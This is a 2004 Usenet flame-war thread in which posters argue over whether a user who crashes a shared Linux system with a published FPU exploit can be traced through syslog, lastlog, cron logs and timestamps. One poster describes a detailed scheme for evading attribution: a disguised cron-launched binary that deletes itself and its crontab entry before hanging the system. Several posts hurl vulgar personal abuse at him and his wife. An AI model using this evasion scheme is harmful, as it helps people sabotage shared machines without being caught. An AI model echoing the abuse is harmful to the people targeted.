> You've just simply said I'm wrong without even providing a single
> suggestion whatsoever, of where this supposed tracking information DOES
> exist. If you would simply do that one little tiny thing, then everyone,
> even people who aren't sure who is correct in this case, could verify that
> your claim is the correct one.
>
> Otherwise it looks like your just blowing smoke.
>
>
Nah, you just don't know where to look. Simple enough.
Find out when system hung (hint, syslog will tell you that.)
Now, check who was logged in (type lastlog at a shell) see who was
logged in at that time.
Now, if you have 10,000 folks logged in, you'll need to start getting
fancy. But for your machine, the one you claimed you couldn't tell who
did it, please post the relevent entries from above, and I'll probably
be able to tell you what username did it. If not, it will give clues for
the next step.
If you are looking for the big neon >I DID IT< flashing sign, you will
probably be disappointed.
(oh, check cronlog too, and the crontabs of all users. In case the user
was timebombing it)
Unless of course you're too busy and important of course.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1ybFd90bcYOAWPYRAt+XAKDvUxR84r0N
Vb76fp81/7QxcE62zACg0Bru
LAdPJKXGI5EAZSbMxovYCAg=
=Jf6P
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
All life is a conjugation of the verb "to eat"
| |
| Jim Richardson 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 10:05:12 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 09:34:31 +0000, Peter Jensen wrote:
>
>
> There could be lots of people logged in at any given time, that doesn't
> narrow it down to an individual user.
>
it starts you in the right direction, and you can start looking for
executables, after all, since the machine hung, the evildoer(tm) didn't
have the chance to wipe the records.
>
> That doesn't specify that particular user caused the crash.
>
>
> Owning a copy of exploit code is not illegal.
>
Straw man, no one said it was. Peter simply pointed out that the
evildoer(tm) had to have read and exec perms on the given code. It's one
more footstep in the trail. Do you disagree? Do you know of a way that
the person could have deleted the malware after the machine hung.
>
> No it's not. It doesn't prove that any single person actually DID
> something.
>
No, but if there's only one copy available, and that account was logged
in, it is strong evidence of same, and is worth investigating further.
Do you disagree?
>
> Yeah, as long as your willing to convict someone on vague circumstantial
> evidence.
>
Convict? this isn't a court of law, this is private property and
destruction of... Does this confuse you?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1yfmd90bcYOAWPYRAj6fAKC1alLdUn4u
69kukxFfbWJygnTSWACeLkYz
q3d4Kuufox2D+dfxvm9W3uc=
=6jTT
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
As practiced by computer science, the study of programming is an unholy
mixture of mathematics, literary criticism, and folklore.
-- B. A. Sheil, 1981
| |
|
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 00:44:03 +0000, John wrote:
>
>
>
> Then compile and run it, you surely are invulnerable, what harm could it
> do, or are you not sure?
I did...see <1gGBc.8995$bs4.3777@newsread3.news.atl.earthlink.net>
>
> Since you're all patched up to date, then you should be invulnerable
> to the FPU exploit code, right?. I say your not.
>
> The only way to find out for sure is to compile and run the code. You can
> get it from here:
>
> http://linuxreviews.org/news/2004-0...rash/index.html
>
> If you're not willing to run a simple little test, the your pronouncements
> of how your all secure and invulnerable because of Linux's great bug
> fixing and package management will ring a little hollow.
>
> I'm not posting any binaries, I'm not asking for help in "OwNinG"
> anybodies system. I'm just saying if you aren't willing to test what you
> say is actually true, I don't particularly want to hear all your hot air
> about how great this or some other attribute of the OSS patch/update
> system is.
>
I tried it and got a bunch of "error:stray '\302' in program" messages. Oh,
and there was this one:
warning: use of memory input without lvalue in asm operand 0 is deprecated
| |
| Peter Jensen 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
T.G.Reaper wrote:
>
> There could be lots of people logged in at any given time, that
> doesn't narrow it down to an individual user.
No, but it does narrow it down to fewer than it otherwise would. This
is detective work we're talking about, so narrowing down the suspects is
obviously the first step. Sheesh, you're clueless about investigations.
Of course that was obvious from the log you chose to display in order to
show that there was supposedly no evidence ...
>
> That doesn't specify that particular user caused the crash.
Not in itself, no. However, if a user is logged on at the time of the
freeze, he owns the nasty binary, and that binary has an atime record of
just before the freeze, then it's more than enough evidence in my book.
I suspect it's also enough for the police. It's called placing the
suspect at the crime scene.
>
> Owning a copy of exploit code is not illegal.
If I found even source code for something that could in some way harm
the machine in the possession of some user, I would disable his account
immediately, pending an explanation. I'm entitled to do that, as it's
my property. I'm pretty sure every publicly accessible shell account
out there has similar TOS.
But you're right, I guess it's not illegal in the eyes of the law
enforcement. However, if I could also show that it's been *used*, then
it's an entirely different matter.
>
> No it's not. It doesn't prove that any single person actually DID
> something.
And if it's the only copy on the machine, and it has been accessed at
the time of the freeze, and the user in question was logged in, would
you still not say that's enough evidence? Be honest for a change, how
would *you* see it if it was *your* machine?
>
> Yeah, as long as your willing to convict someone on vague
> circumstantial evidence.
There is nothing circumstantial about it. If a copy of the nasty was
shown to be accessed moments before a freeze, and it can be shown that
the owner was logged in, there is more than enough evidence. Both for
me, and probably for any law enforcement you'd like to involve. Not
that I see that happening. At most I'd imagine you'd get kicked off the
machine, fired (if you were stupid enough to do this at your place of
employment), and sued for any damages you caused.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1z7Od1ZThqotgfgRAv3xAKCc5XHYINZb
vseVJA6cDV23Yr+KwwCfU5vd
/eTYnN6rMvNKPmri78y5w10=
=9b2K
-----END PGP SIGNATURE-----
--
PeKaJe
No problem is insoluble in all conceivable circumstances.
| |
| The Ghost In The Machine 2004-06-26, 1:23 pm |
| In comp.os.linux.advocacy, T.G.Reaper
<Reaper@127.0.0.1.Com>
wrote
on Mon, 21 Jun 2004 09:58:13 -0700
<pan.2004.06.21.16.58.11.830947@127.0.0.1.Com>:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are made,
> nothing is updated or saved, even the log entries that are waiting to be
> flushed to disk are gone.
>
> Time to put up or shut up Peter. I've already posted system log entries
> showing that the system log shows no tractable information. You don't get
> to just say I'm wrong or don't know what I'm doing. Either crash a system
> with the exploit code, and post the log entries showing how the hang can
> be traced to a particular user, or shut up.
>
Some variants of syslog can throw records at another machine, and
accept records from another machine.
I'll leave it to you to deduce the obvious. :-)
--
#191, ewill3@earthlink.net
It's still legal to go .sigless.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 02:33:24 -0500, Sinister Midget wrote:
> On 2004-06-21, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
[vbcol=seagreen]
> http://www.securityfocus.com/archive/1/264590
>
> http://securityresponse.symantec.co...32.korgo.l.html
>
> http://www.utexas.edu/its/alerts/sobig.html
>
> http://www.microsoft.com/technet/se...n/ms04-011.mspx
>
> That's enough. There are enough that this could go on for years and
> years.
>
> Yeah, some of those aren't so new. But I wanted to illustrate the
> problems aren't new either.
>
> So, which ones are "exaggerated half truths" and/or "meaningless
> generalities"? Are you going to claim to know more about WinDOS than
> MICROS~1? They have some (dis)honorable mentions there, too.
No, I'm not claiming to know more about Windows than Microsoft. I am
claiming to know more about Windows than You, or most other people for
that matter.
You can post all the references to advisories, and anecdotal stories you
like. There are three Windows systems here in my apartment, and every one
of them is clean, secure, and stable They have all been that way since the
first day they were brought up. Therefore it is not impossible to create
and maintain a safe, clean, reliable Windows system, I know, because I've
actually done it.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 02:33:24 -0500, Sinister Midget wrote:
>
>
>
> No, I'm not claiming to know more about Windows than Microsoft. I am
> claiming to know more about Windows than You, or most other people for
> that matter.
BWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAA
AHAHAHAHAHAHAHAHA
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAAAAAHH
AHAHAHAHAHAHAHA
HAHAHAHAHAHAHAHAHAHHAHA!!!!
You're nothing but a useless obtuse shitbag, the most ridiculed
individual on Usenet. You wouldn't know a fact if it hit you square
in the cunt. You are barely intelligible, let alone technically adept.
You don't know how to read, how to lie consistently, how to
complrehend, yet here you are making a complete cow-patty of
yourself. Let's just say you are quite skillful at making an obtuse
shit of yourself and embarrassing your poor wife who was dragged
into your world of shit hoping she would draw sympathy and deter
the condescending attitudes towards your limited intellect, if you
can call it that.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 18:34:15 +0000, Jim Richardson wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Mon, 21 Jun 2004 09:48:34 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
>
> Nah, you just don't know where to look. Simple enough.
>
> Find out when system hung (hint, syslog will tell you that.)
I know.
> Now, check who was logged in (type lastlog at a shell) see who was
> logged in at that time.
> Now, if you have 10,000 folks logged in, you'll need to start getting
> fancy.
No shit. That was the point.
How many single user systems are going to be maliciously and deliberately
crashed the by their owner owner?
Do you really think that being able to determine who was logged on to a
system that has a single user is some type of great accomplishment?
> If you are looking for the big neon >I DID IT< flashing sign, you will
> probably be disappointed.
>
> (oh, check cronlog too, and the crontabs of all users. In case the user
> was timebombing it)
Good idea, I'm not enough of a hacker to have thought of that. Since the
disk image isn't needed once the code is loaded into memory, the exploit
could be modified to delete the executable before crashing the system. You
could also clean the crontab entry, but it wouldn't really be necessary.
Then how would you determine who the culprit was?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Tue, 22 Jun 2004 00:00:15 +0000, The Ghost In The Machine wrote:
> Some variants of syslog can throw records at another machine, and
> accept records from another machine.
>
> I'll leave it to you to deduce the obvious. :-)
1. Very few systems log externally.
2. Many Modern logging daemons frequently cache entries, if the system
hangs hard, it's not going to be throwing anything anywhere.
Your "solution" doesn't seem to do very much towards determining who
executed the bad code that hung the system.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 19:23:40 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
> You are really a retard. You know next to nothing about linux and then claim
> this bullshit
You're the one who can't provide a clear, coherent explanation of
how it would be possible to trace who executed a piece of exploit code to
hang on a system that has a few dozen users.
You claim that it's bullshit, yet you can't even provide a single example
of how it could actually be done.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 18:34:19 +0000, Jim Richardson wrote:
> Straw man, no one said it was. Peter simply pointed out that the
> evildoer(tm) had to have read and exec perms on the given code. It's one
> more footstep in the trail. Do you disagree? Do you know of a way that
> the person could have deleted the malware after the machine hung.
No, but it could easily be done Before the system is hung, and
After the exploit code is loaded into memory.
>
> No, but if there's only one copy available,
Which was erased as soon as it was loaded into memory.
> and that account was logged
Which it's not because the exploit code was loaded and executed by cron.
> in, it is strong evidence of same, and is worth investigating further.
> Do you disagree?
Yes, see above.
>
>
>
> Convict? this isn't a court of law, this is private property and
> destruction of... Does this confuse you?
"Conviction" was used only in the context of determining guilt, does that
confuse you?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> On Tue, 22 Jun 2004 00:00:15 +0000, The Ghost In The Machine wrote:
>
>
> 1. Very few systems log externally.
So, now you're an authority on public IT server configurations?
According to you, secure corporate IT servers and big-corp
server farms with public access configure themselves like
your XXXXing desktop, you XXXXing useless obtuse shitsack? Do
you know how XXXXing stupid you seem making such an idiotic,
ridiculous assertion, you obtuse snotXXXX?
>
> 2. Many Modern logging daemons frequently cache entries,
Are you madly XXXXed in the head? Did the wife push that
strapon too deep into your throat and XXXX your brain
into more obtuseness?
You have go to be the single most obtuse XXXXing shit
on the face of this Earth. It's a good thing your wife
isn't able to browse the net and read the Google
archives because she may realize what a XXXXing
moron loser to which she's ball-and-chained herself.
Poor Mrs. Reaper. Having to suffer the unbearable
intellectual embarrassment that is you.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 19:11:29 +0000, John wrote:
> T.G.Reaper wrote:
>
>
>
> I tried it and got a bunch of "error:stray '\302' in program" messages. Oh,
> and there was this one:
> warning: use of memory input without lvalue in asm operand 0 is deprecated
Look, I'm not giving some tutorial in programming 101. If you feed
gcc a clean file without extraneous characters, it WILL compile. If you
run it, it will probably hang your system. Personally I don't care if you
run it or not.
You can get a clean copy of the source from here:
http://linuxreviews.org/news/2004-0...index.html#toc6
I've posted a bunch of messages claiming that executing this
exploit code will hang nearly any Linux system. I find it interesting
that there have been exactly zero replies from ANYONE, claiming they've
compiled and run the executable. What's going on?
Everybody's saying I'm wrong, but I'm not seeing any replies saying I'm
wrong AND they've actually compiled and run the exploit
code....hmmm...wonder why that is?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
No entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> Look, I'm not giving some tutorial in programming 101.
Oh, that's a XXXXing riot. You're like a blind retarded goat
teaching a deaf mute dog the finer points of eating your
own feces.
| |
| Jim Richardson 2004-06-26, 1:24 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 19:26:46 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 18:34:15 +0000, Jim Richardson wrote:
>
>
> I know.
>
>
> No shit. That was the point.
>
> How many single user systems are going to be maliciously and deliberately
> crashed the by their owner owner?
>
> Do you really think that being able to determine who was logged on to a
> system that has a single user is some type of great accomplishment?
>
>
> Good idea, I'm not enough of a hacker to have thought of that. Since the
> disk image isn't needed once the code is loaded into memory, the exploit
> could be modified to delete the executable before crashing the system. You
> could also clean the crontab entry, but it wouldn't really be necessary.
>
> Then how would you determine who the culprit was?
>
Cleaning the crontab entry would leave traces in the cron log. Which
said user can't write to or delete.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1+yud90bcYOAWPYRAkZ1AJ4tnkbXN/D5oT26EsE47nFD5LGeOQCbB1vF
P6T1o1MUtNBUOzaoIfuhSYs=
=da8x
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
"We have to go forth and crush every world view that doesn't believe in
tolerance and free speech," - David Brin
| |
| T.G.Reaper 2004-06-26, 1:25 pm |
| On Tue, 22 Jun 2004 02:42:03 +0000, Sinister Midget wrote:
> You're trying to pass off your *3* machines as the norm.
No I'm not. I'm claiming that it is in fact possible to install and
maintain, a safe, clean, and reliable Windows system. Since that IS
possible, there is obviously nothing about the design or architecture of
Windows that makes it impossible.
> I gave you "cold hard facts" that you're trying to ignore with the use
> of your anecdotal evidence.
No, you gave me some tales of woe orginating from people who's
experience, background, and skill level are not known. That doesn't say
anything about the quality or robustness of the OS.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:47 pm |
| On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
> Cleaning the crontab entry would leave traces in the cron log. Which
> said user can't write to or delete.
That's your whole case, a deleted cron entry?
You're going to fire or prosecute someone based on just that?
Remember, once loaded in to memory the code could clean the cron tab
entry, delete the executable, then wait for hours or days before actually
hanging the system.
Don't look now but the ability to track down and identify a user who
wants to crash almost any Linux system, seems to have just vanished.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Sinister Midget 2004-06-26, 1:47 pm |
| On 2004-06-22, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
>
>
> That's your whole case, a deleted cron entry?
And system logs. And timestamps on files (hint-hint).
> You're going to fire or prosecute someone based on just that?
No. System logs, timestamps on files (hint-hint), too.
> Remember, once loaded in to memory the code could clean the cron tab
> entry, delete the executable, then wait for hours or days before actually
> hanging the system.
It would nearly always require the user to stay logged in, or it would
require changes in something (hint-hint) that could be detected via
timestamps on files (hint-hint). Even more damning and easily found
would be a process started by a user who wasn't logged in at the time
of the occurrence of the problem itself. For me, that would actually
make it easier to trace.
> Don't look now but the ability to track down and identify a user who
> wants to crash almost any Linux system, seems to have just vanished.
Where'd it go? I still have mine here. What did you do with yours?
--
Microsoft: The company that made email dangerous.
| |
| Jim Richardson 2004-06-26, 1:48 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 22 Jun 2004 09:30:13 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
>
>
> That's your whole case, a deleted cron entry?
>
> You're going to fire or prosecute someone based on just that?
>
Who's talking about prosecuting someone. I am talking about booting them
off the system.
I notice you haven't responded with the log entries I requested from
your "example" DoS, why is that? afraid I can actually tell you what
acct ran the malware?
> Remember, once loaded in to memory the code could clean the cron tab
> entry, delete the executable, then wait for hours or days before actually
> hanging the system.
>
except of course, that the system logs, are not writable by the normal
users. So sad, too bad.
> Don't look now but the ability to track down and identify a user who
> wants to crash almost any Linux system, seems to have just vanished.
>
and yet, you have failed to provide the log entries requested, what's
the matter, afraid of the result?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2JFod90bcYOAWPYRAu3uAJwIAkvMANVh
LsFPeZr/5Kh5tN68CACcD3bj
AKFQ3xnlBzNXRCDTSsJZUSI=
=bfhg
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
"Illegal aliens have always been a problem in the United States.
Ask any Indian. "
--- Robert Orben
| |
| T.G.Reaper 2004-06-26, 1:48 pm |
| On Tue, 22 Jun 2004 17:42:16 +0000, Sinister Midget wrote:
> On 2004-06-22, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
[vbcol=seagreen]
>
> And system logs. And timestamps on files (hint-hint).
Timestamps on what files the executable is deleted before the code crashes
the system, and the cron entry deletion could occur hours or days before
the exploit code actually causes the crash, so the timestamps on thos logs
don't tell you anything.
>
> No. System logs, timestamps on files (hint-hint), too.
There aren't any timestamps that actually tell you anything.
>
> It would nearly always require the user to stay logged in,
No it wouldn't. Ever heard of a time bomb?
> or it would
> require changes in something (hint-hint) that could be detected via
> timestamps on files (hint-hint).
How exactly does that help if the crontab entry, and the executable are
deleted hours or days before the system crashes?
> Even more damning and easily found
> would be a process started by a user who wasn't logged in at the time
> of the occurrence of the problem itself. For me, that would actually
> make it easier to trace.
I can imagine scheduling a cron job to delete various temporary files, or
to calc and update some statistics for me daily at a time when I'm not
logged in. Just because a user started a job when not logged in doesn't
really indicate anything.
Don't look now but the ability to track down and identify a user who
wants to crash almost any Linux system, seems to have just vanished.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:48 pm |
| On Tue, 22 Jun 2004 20:34:20 +0000, Jim Richardson wrote:
> I notice you haven't responded with the log entries I requested from
> your "example" DoS, why is that? afraid I can actually tell you what
> acct ran the malware?
Since my machine only has one user, how difficult do you think it is to
tell who caused the crash. If I posted anything you would claim that it
obviously shows that "Reaper" executed the malicious code, but you
would also claim that I just don't know how to read logs and that's why I
can't see it.
>
>
> except of course, that the system logs, are not writable by the normal
> users. So sad, too bad.
Duh. Unfortunately for you, I've already explained that an innocent
looking cron entry that actually loaded the malicious code was deleted
hours or days before the actual system hang. The binary image of
the malicious code was also deleted hours or days before the actual system
hang. The system log entries that might have been written just before the
hang, were never flushed to disk because the system was...well...hung.
IOW the system log doesn't contain any identifying information. All
that is relevant in the cron log is an execution of an innocently named
binary, and a subsequent crontab entry deletion that looks equally
innocuous, both of which happened long before the actual hang
occurred.
>
> and yet, you have failed to provide the log entries requested, what's
> the matter, afraid of the result?
I explained that above. Either explain how it could be done given the
circumstances, or admit that the act would in fact be untraceable.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Jim Richardson 2004-06-26, 1:49 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 22 Jun 2004 20:14:59 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Tue, 22 Jun 2004 20:34:20 +0000, Jim Richardson wrote:
>
>
>
> Since my machine only has one user, how difficult do you think it is
> to tell who caused the crash. If I posted anything you would claim
> that it obviously shows that "Reaper" executed the malicious code, but
> you would also claim that I just don't know how to read logs and
> that's why I can't see it.
>
You made a claim, that the exploit could not be tracked.
You have been shown several examples of ways to track that exploit. Your
responce was to natter on about some other exploit code which hasn't
actually been written, but, you assure us, would work as you claim.
Frankly you're batting zero so far.
>
> Duh. Unfortunately for you, I've already explained that an innocent
> looking cron entry that actually loaded the malicious code was deleted
> hours or days before the actual system hang. The binary image of
> the malicious code was also deleted hours or days before the actual system
> hang. The system log entries that might have been written just before the
> hang, were never flushed to disk because the system was...well...hung.
>
> IOW the system log doesn't contain any identifying information. All
> that is relevant in the cron log is an execution of an innocently named
> binary, and a subsequent crontab entry deletion that looks equally
> innocuous, both of which happened long before the actual hang
> occurred.
>
not relevent to the exploit code you posted. You are moving the
goalposts, again.
>
> I explained that above. Either explain how it could be done given the
> circumstances, or admit that the act would in fact be untraceable.
>
Show me the logs.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2ThRd90bcYOAWPYRArMQAJ0dLAdVC9a7
eRp6XWSEPAZ6BxUangCffmtB
RKq+98S0I2+G+OPgCUyOohI=
=eQge
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Only wimps use tape backup: _real_ men just upload their important stuff
on ftp, and let the rest of the world mirror it.
-- Linus Torvalds
| |
| T.G.Reaper 2004-06-26, 1:49 pm |
| On Wed, 23 Jun 2004 05:06:16 +0000, Sinister Midget wrote:
>
> A crontab entry can't be deleted until it's implemented or it won't be
> implemented.
Duh.
Example:
Day one: [June 19th 10:00:02]:
Regular user logs in and schedules cron to load and execute
/home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
hrs.
User logs out at the end of the day normally.
Day two, three and four:
User logs in and out normally.
Day five [ June 24th 03:00:00 ]:
cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
The malicious code just sits idle for an hour or two, then removes the
cron entry that loaded it, and deletes the file:
/home/UserName/bin/cleanup.exe. Then it goes to sleep for about 16 hours.
During day five the malicious user logs in and out as they normally do.
At some point after the malicious user has logged out, the malicious code
which only exists in memory at this point, will choose to actually hang
the system, stopping all logging and everything else...DEAD.
> The crontab will need to be updated and replaced to get rid of the
> evidence. Since the user won't have root's privileges, the time can't be
> altered.
Not necessary.
> During this implementation, there will be entries that will
> identify the user:
>
> 1. running a task without being logged in (points to delayed start of a
> process)
That's not proof of anything, int fact it's not even really suggestive of
malicious behavior.
> 2. a date/timestamp on a crontab in /var/spool/cron that is around the
> time of the catastrophe
It won't be, see example above.
> just for starters.
You haven't actually gotten started yet.
> Unless you want to give the user root's permissions so he/she could
> conveniently change the clock.
It's not necessary to change the clock.
> Now, why not post the logs Jim asked about (numerous times) so we can
> see if you're right or the rest of us are?
Why are you so uncomfortable with using a specific detailed example?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:49 pm |
| On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
> You made a claim, that the exploit could not be tracked.
Correct.
> You have been shown several examples of ways to track that exploit. Your
> responce was to natter on about some other exploit code which hasn't
> actually been written, but, you assure us, would work as you claim.
Okay, you tell me why this example would not work:
Example:
Day one: [June 19th 10:00:02]:
Regular user logs in and schedules cron to load and execute
/home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
hrs.
User logs out at the end of the day normally.
Day two, three and four:
User logs in and out normally.
Day five [ June 24th 03:00:00 ]:
cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
The malicious code just sits idle for an hour or two, then removes the
cron entry that loaded it, and deletes the file:
/home/UserName/bin/cleanup.exe.
Then it goes to sleep for about 16 hours or so.
During day five the malicious user logs in and out as they normally do.
At some point after the malicious user has logged out, the malicious code
which only exists in memory at this point, will choose to actually hang
the system, stopping all logging and everything else...DEAD.
> Frankly you're batting zero so far.
Then you should be able to easily explain how it would be determined who
was responsible for killing the system in the above example.
> not relevent to the exploit code you posted. You are moving the
> goalposts, again.
So the ability to track a malicious user depends on the bad people only
running the malicious code exactly as published? Wow, that's really
comforting....NOT.
> Show me the logs.
Why are you so uncomfortable working with a detailed specific example?
If you can explain *clearly* and *reasonably* how you could identify the
malicious user in the example, I'll gladly modify the exploit code to
match the example. Then I'll run it on my system and post all the
logs you want.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Mart van de Wege 2004-06-26, 1:50 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
> On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
>
>
> Correct.
>
>
> Okay, you tell me why this example would not work:
>
Easy. See my question below.
> Example:
>
> Day one: [June 19th 10:00:02]:
>
> Regular user logs in and schedules cron to load and execute
> /home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
> hrs.
>
> User logs out at the end of the day normally.
>
> Day two, three and four:
>
> User logs in and out normally.
>
> Day five [ June 24th 03:00:00 ]:
>
> cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
>
> The malicious code just sits idle for an hour or two, then removes the
> cron entry that loaded it, and deletes the file:
> /home/UserName/bin/cleanup.exe.
>
<snip>
Tell us, oh Master Sysadmin, how do you delete a crontab entry without
leaving traces? Edits and deletes to user crontabs are logged to
syslog, and users can't bypass the normal edit/delete process because
they don't have write/delete access to their crontab in
/var/spool/cron.
So, maybe your little trick makes tracing the culprit a *little* more
difficult, but any sysadmin worth his salt will *still* be able to
find out who crashed his server.
Oh, and if I were to ever find a user misusing his crontab privileges
to run unknown binaries from his /home, I'd have a good talk why this
is a Bad Thing(tm). Perhaps you Windows users are trusting enough to
just let regular users run everything they want, but I like my secure
systems to *stay* secure, thankyouverymuch.
Mart
--
